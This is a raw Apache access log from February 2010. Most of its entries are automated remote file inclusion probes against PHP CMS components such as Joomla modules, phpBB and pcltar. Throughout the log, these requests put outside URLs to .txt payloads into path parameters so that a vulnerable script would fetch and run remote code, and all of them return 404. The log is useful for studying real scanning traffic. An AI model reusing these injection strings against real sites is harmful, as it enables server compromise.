211.115.68.54 - - [23/Feb/2010:01:09:13 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Feb/2010:01:09:29 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Feb/2010:01:09:29 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Feb/2010:01:09:29 -0500] "GET /logs/access_log.Q109102900//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:01:10:02 -0500] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 248 "-" "Microsoft Pocket Internet Explorer/0.6"
66.254.98.142 - - [23/Feb/2010:01:10:02 -0500] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 243 "-" "Microsoft Pocket Internet Explorer/0.6"
189.108.172.26 - - [23/Feb/2010:01:10:26 -0500] "GET /logs/access_log.Q109102900//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Feb/2010:01:10:26 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Feb/2010:01:10:26 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:11:21 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:11:21 -0500] "GET /logs/access_log.Q109071400//components/com_simpleboard/image_upload.php?sbp=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:11:23 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
80.23.181.2 - - [23/Feb/2010:01:11:29 -0500] "GET /logs/index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
80.23.181.2 - - [23/Feb/2010:01:11:29 -0500] "GET /logs/access_log.Q109051000%20%20/index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
80.23.181.2 - - [23/Feb/2010:01:11:32 -0500] "GET /index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
220.80.108.81 - - [23/Feb/2010:01:11:35 -0500] "GET //bbs/write_comment_update.php?board_skin_path=http://www.petrus.com.ua/cms/idtasikfeel.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
220.80.108.81 - - [23/Feb/2010:01:11:35 -0500] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.petrus.com.ua/cms/idtasikfeel.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
220.80.108.81 - - [23/Feb/2010:01:11:35 -0500] "GET /logs/access_log.Q110021000//bbs/write_comment_update.php?board_skin_path=http://www.petrus.com.ua/cms/idtasikfeel.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
220.80.108.81 - - [23/Feb/2010:01:11:35 -0500] "GET /logs/error_log.Q110021300//bbs/write_comment_update.php?board_skin_path=http://www.petrus.com.ua/cms/idtasikfeel.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:12:05 -0500] "GET /logs/access_log.Q109101800//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:12:06 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:12:07 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:12:17 -0500] "GET /logs/error_log.Q110011600%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:12:21 -0500] "GET /logs/error_log.Q110011600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:12:31 -0500] "GET /logs/error_log.Q110011600%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.249.71.109 - - [23/Feb/2010:01:12:36 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L029814584B64480046F0091+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.115.68.54 - - [23/Feb/2010:01:12:46 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:12:46 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:12:46 -0500] "GET /logs/access_log.Q109060300//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:12:56 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:12:56 -0500] "GET /logs/access_log.Q109072600%20%20//admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:12:56 -0500] "GET /logs/error_log.Q109103000%20%20//admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:12:56 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:13:07 -0500] "GET /logs/error_log.Q110011600%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:13:13 -0500] "GET /logs/error_log.Q109100600//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:13:14 -0500] "GET /logs/access_log.Q109072600%20%20//admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:13:14 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:13:14 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:13:14 -0500] "GET /logs/error_log.Q109103000%20%20//admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:01:13:28 -0500] "GET /logs/access_log.Q109062500//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:01:13:28 -0500] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:01:13:28 -0500] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:01:13:33 -0500] "GET /logs/error_log.Q109062500//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
203.250.124.252 - - [23/Feb/2010:01:13:34 -0500] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
203.250.124.252 - - [23/Feb/2010:01:13:34 -0500] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.250.124.252 - - [23/Feb/2010:01:13:34 -0500] "GET /logs/access_log.Q109062500//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:13:37 -0500] "GET ////inc/cmses/aedating4CMS.php?dir[inc]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:13:38 -0500] "GET /logs////inc/cmses/aedating4CMS.php?dir[inc]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:13:41 -0500] "GET /logs/access_log.Q110021000////inc/cmses/aedating4CMS.php?dir[inc]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:13:41 -0500] "GET ////inc/cmses/aedating4CMS.php?dir[inc]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:13:42 -0500] "GET ////inc/cmses/aedating4CMS.php?dir[inc]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:13:44 -0500] "GET /logs////inc/cmses/aedating4CMS.php?dir[inc]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:13:45 -0500] "GET /logs////inc/cmses/aedating4CMS.php?dir[inc]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:13:47 -0500] "GET /logs/access_log.Q110021000%20%20////inc/cmses/aedating4CMS.php?dir[inc]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:13:49 -0500] "GET /logs////inc/cmses/aedating4CMS.php?dir[inc]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:13:49 -0500] "GET ////inc/cmses/aedating4CMS.php?dir[inc]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:13:49 -0500] "GET /logs/access_log.Q110021000////inc/cmses/aedating4CMS.php?dir[inc]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:13:53 -0500] "GET /logs/error_log.Q110011600%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:14:01 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:14:01 -0500] "GET /logs/access_log.Q109102900//admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:14:01 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:14:02 -0500] "GET /logs/access_log.Q109102900//admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:14:02 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:14:02 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:14:28 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:14:28 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:14:28 -0500] "GET /logs/access_log.Q109101800//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:14:36 -0500] "GET /logs/access_log.Q109052000//admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:14:40 -0500] "GET /logs/access_log.Q109052000//admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:01:14:50 -0500] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 248 "-" "Microsoft Pocket Internet Explorer/0.6"
66.254.98.142 - - [23/Feb/2010:01:14:50 -0500] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 243 "-" "Microsoft Pocket Internet Explorer/0.6"
88.84.137.160 - - [23/Feb/2010:01:15:05 -0500] "GET /logs///write_comment_update.php?board_skin_path=http://www.britishschool.it/british//dmdocuments/test.txt??? HTTP/1.1" 404 229 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
88.84.137.160 - - [23/Feb/2010:01:15:05 -0500] "GET ///write_comment_update.php?board_skin_path=http://www.britishschool.it/british//dmdocuments/test.txt??? HTTP/1.1" 404 224 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
218.38.243.44 - - [23/Feb/2010:01:15:09 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.38.243.44 - - [23/Feb/2010:01:15:09 -0500] "GET /logs/access_log.Q109102900//admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.38.243.44 - - [23/Feb/2010:01:15:12 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
218.38.243.44 - - [23/Feb/2010:01:15:25 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.38.243.44 - - [23/Feb/2010:01:15:26 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
218.38.243.44 - - [23/Feb/2010:01:15:29 -0500] "GET /logs/access_log.Q109102900//admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Feb/2010:01:16:03 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.243.44 - - [23/Feb/2010:01:16:13 -0500] "GET /logs/access_log.Q109052000//admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.39.137.162 - - [23/Feb/2010:01:16:23 -0500] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.39.137.162 - - [23/Feb/2010:01:16:23 -0500] "GET /logs/access_log.Q109062500//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.39.137.162 - - [23/Feb/2010:01:16:24 -0500] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:16:25 -0500] "GET /logs/access_log.Q109101000%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:16:25 -0500] "GET /logs/error_log.Q110020800%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
218.38.243.44 - - [23/Feb/2010:01:16:27 -0500] "GET /logs/access_log.Q109052000//admin/business_inc/saveserver.php?thisdir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:16:27 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.195.115.186 - - [23/Feb/2010:01:15:36 -0500] "GET /logs/access_log.Q110021800 HTTP/1.0" 200 5888328 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.93.147.154 - - [23/Feb/2010:01:16:30 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:16:30 -0500] "GET /logs/access_log.Q109080400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:16:33 -0500] "GET /logs/access_log.Q109101000%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:16:33 -0500] "GET /logs/error_log.Q110020800%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:01:16:40 -0500] "GET /logs/error_log.Q109091000%20%20//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:01:16:40 -0500] "GET //index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:01:16:40 -0500] "GET /logs//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:16:43 -0500] "GET /logs/access_log.Q109101000%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:16:44 -0500] "GET /logs/error_log.Q110020800%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:16:49 -0500] "GET /logs/access_log.Q109101000%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:16:49 -0500] "GET /logs/error_log.Q110020800%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:16:51 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:16:51 -0500] "GET /logs/access_log.Q109080400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:16:53 -0500] "GET /logs////administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:16:54 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:01:16:56 -0500] "GET /logs/access_log.Q109091000%20%20//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:17:02 -0500] "GET ////administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:01:17:08 -0500] "GET /logs/access_log.Q109052000//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:17:24 -0500] "GET /logs/access_log.Q109080400////administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
210.51.24.102 - - [23/Feb/2010:01:17:24 -0500] "GET /logs/access_log.Q109062700/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/do.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.65"
210.51.24.102 - - [23/Feb/2010:01:17:24 -0500] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/do.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
210.51.24.102 - - [23/Feb/2010:01:17:24 -0500] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/do.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.65"
74.50.85.229 - - [23/Feb/2010:01:17:26 -0500] "GET /logs/access_log.Q109101000%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:17:26 -0500] "GET /logs/error_log.Q110020800%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
210.51.24.102 - - [23/Feb/2010:01:17:34 -0500] "GET /logs/access_log.Q109112000/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.3hdigital.com/do.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.65"
211.115.68.54 - - [23/Feb/2010:01:17:48 -0500] "GET ////administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:17:52 -0500] "GET /logs////administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:01:18:13 -0500] "GET /logs/error_log.Q109062500%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:01:18:13 -0500] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:01:18:13 -0500] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:01:18:15 -0500] "GET /logs/access_log.Q109062500//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
67.195.115.186 - - [23/Feb/2010:01:17:51 -0500] "GET /logs/error_log.Q109070500 HTTP/1.0" 200 2665359 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.251.189.205 - - [23/Feb/2010:01:18:18 -0500] "GET /logs/access_log.Q109062500%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
